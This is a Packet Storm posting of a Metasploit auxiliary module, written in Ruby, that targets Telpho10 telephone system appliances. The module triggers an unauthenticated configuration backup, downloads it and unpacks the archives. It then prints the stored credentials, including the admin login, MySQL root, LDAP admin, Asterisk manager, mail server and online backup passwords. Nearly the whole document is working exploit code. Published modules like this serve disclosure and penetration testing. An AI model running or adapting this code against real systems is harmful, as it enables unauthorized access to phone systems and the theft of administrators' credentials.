

Telpho10 Backup Credentials Dumper

This Metasploit module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This Metasploit module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This Metasploit module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.

Packet Storm
#sql#vulnerability#linux#git#php#ldap#auth
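##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Telpho10 Backup Credentials Dumper',
        'Description' => %q{
          This module exploits a vulnerability present in all versions of Telpho10 telephone system
          appliance. This module generates a configuration backup of Telpho10,
          downloads the file and dumps the credentials for admin login,
          phpmyadmin, phpldapadmin, etc.
          This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
        },
        'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
        'License' => MSF_LICENSE,
        'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
        'Platform' => 'linux',
        'Privileged' => false,
        'DisclosureDate' => '2016-09-02'
      )
    )
    register_options(
      [
        Opt::RPORT(80)
      ]
    )
  end

  # Unpack a tar archive into a directory next to it (the path with ".tar"
  # and everything after it stripped) and return that directory.
  #
  # Only regular files are written, and each entry name is reduced to its
  # basename before being joined to the destination, so an entry name in the
  # downloaded backup cannot place a file outside the loot directory. Any
  # directory structure inside the archive is flattened as a consequence;
  # the caller only looks for top-level files (mysql.tar, mysql.epb).
  #
  # @param tarfile [String] path of a ".tar" file on disk
  # @return [String] directory the entries were written to
  def untar(tarfile)
    destination = tarfile.split('.tar').first
    FileUtils.mkdir_p(destination)
    File.open(tarfile, 'rb') do |file|
      Rex::Tar::Reader.new(file) do |tar|
        tar.each do |entry|
          next unless entry.file?

          dest = File.join(destination, File.basename(entry.full_name))
          File.open(dest, 'wb') { |f| f.write(entry.read) }
          # Mode is taken verbatim from the archive header and applied to the
          # file just written inside the loot directory.
          File.chmod(entry.header.mode, dest)
        end
      end
    end
    destination
  end

  # Look up +key+ in the PHP-array style config line, where pairs appear as
  # 'key','value'. Returns nil when the key is absent so a missing field is
  # printed empty instead of raising.
  #
  # @param config [String] the config line located by #dump_creds
  # @param key [String] name of the config entry
  # @return [String, nil] captured value, or nil if not present
  def config_value(config, key)
    config[/#{Regexp.escape(key)}','(.*?)'/, 1]
  end

  # Find the configuration line inside the extracted backup and print the
  # credential set it holds, one service at a time.
  #
  # @param mysql_file [String] path to mysql.epb produced by #untar
  # @return [nil]
  def dump_creds(mysql_file)
    config = nil
    # File.foreach closes the handle on every exit path, including a read
    # error. When several lines carry the marker the last one wins.
    File.foreach(mysql_file) do |line|
      config = line if line.include?('adminusername')
    end
    # A backup with no marker line would otherwise raise NoMethodError on nil
    # below and surface upstream as "Could not find credential file.", which
    # points at the wrong cause.
    unless config
      print_error("No 'adminusername' entry found in #{mysql_file}.")
      return nil
    end

    print_status('Login (/telpho/login.php)')
    print_status('-------------------------')
    print_good("Username: #{config_value(config, 'adminusername')}")
    print_good("Password: #{config_value(config, 'adminpassword')}\n")

    print_status('MySQL (/phpmyadmin)')
    print_status('-------------------')
    print_good('Username: root')
    print_good("Password: #{config_value(config, 'dbpassword')}\n")

    print_status('LDAP (/phpldapadmin)')
    print_status('--------------------')
    print_good('Username: cn=admin,dc=localdomain')
    print_good("Password: #{config_value(config, 'ldappassword')}\n")

    print_status('Asterisk MI (port 5038)')
    print_status('-----------------------')
    print_good("Username: #{config_value(config, 'manageruser')}")
    print_good("Password: #{config_value(config, 'managersecret')}\n")

    print_status('Mail configuration')
    print_status('------------------')
    print_good("Mailserver: #{config_value(config, 'ipsmarthost')}")
    print_good("Username:   #{config_value(config, 'mailusername')}")
    print_good("Password:   #{config_value(config, 'mailpassword')}")
    print_good("Mail from:  #{config_value(config, 'mailfrom')}\n")

    print_status('Online Backup')
    print_status('-------------')
    print_good("ID:       #{config_value(config, 'ftpbackupid')}")
    print_good("Password: #{config_value(config, 'ftpbackuppw')}\n")
    nil
  end

  # Trigger a configuration backup, fetch it from the temp directory, store
  # it as loot, unpack the nested mysql archive and dump the credentials.
  #
  # Every failing step prints an error and returns nil; a transport failure
  # is reported by the method-level rescue.
  #
  # @return [nil]
  def run
    res = send_request_cgi({
      'uri' => '/telpho/system/backup.php',
      'method' => 'GET'
    })
    unless res && res.code == 200
      print_error('Could not find vulnerable script. Aborting.')
      return nil
    end
    print_status('Generating backup')
    # Short pause before fetching; presumably the appliance writes the
    # backup after responding — TODO confirm, a fixed delay may be too short
    # on a slow target.
    sleep(1)

    print_status('Downloading backup')
    res = send_request_cgi({
      'uri' => '/telpho/temp/telpho10.epb',
      'method' => 'GET'
    })
    unless res && res.code == 200
      print_error('Failed to download backup file.')
      return nil
    end
    if res.body.to_s.empty?
      print_error('0 bytes returned, file does not exist or is empty.')
      return nil
    end

    path = store_loot(
      'telpho10.backup',
      'application/x-compressed',
      datastore['RHOST'],
      res.body,
      'backup.tar'
    )
    print_good("File saved in: #{path}")

    begin
      extracted = untar(path.to_s)
      mysql = untar("#{extracted}/mysql.tar")
    rescue StandardError
      print_error('Could not unpack files.')
      return nil
    end

    begin
      print_status("Dumping credentials\n")
      dump_creds("#{mysql}/mysql.epb")
    rescue StandardError
      print_error('Could not find credential file.')
      return nil
    end
  rescue ::Rex::ConnectionError
    print_error("#{rhost}:#{rport} - Failed to connect")
    return nil
  end
end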
